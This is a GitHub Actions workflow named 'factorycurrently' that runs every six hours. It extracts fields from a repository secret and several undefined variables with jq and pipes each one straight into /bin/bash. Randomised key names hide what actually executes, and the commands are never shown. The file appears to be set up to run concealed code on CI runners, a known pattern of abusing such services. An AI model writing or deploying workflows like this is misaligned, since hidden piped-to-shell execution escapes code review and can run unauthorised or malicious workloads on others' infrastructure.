name: factorycurrently

on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: factorycurrently
        env:
          e3: ${{ secrets.e3 }}
        run: |
          echo $e3 | jq -r .eu76641 | /bin/bash
          echo $d4 | jq -r .va57798 | /bin/bash
          echo $tvbc5 | jq -r .nf7380 | /bin/bash
          echo $fax3612 | jq -r .y8748 | /bin/bash
          echo $lr0945 | jq -r .ndjzi8 | /bin/bash
          echo $pn0366 | jq -r .fhyo0462 | /bin/bash
          echo $iileh3526 | jq -r .hixon664 | /bin/bash

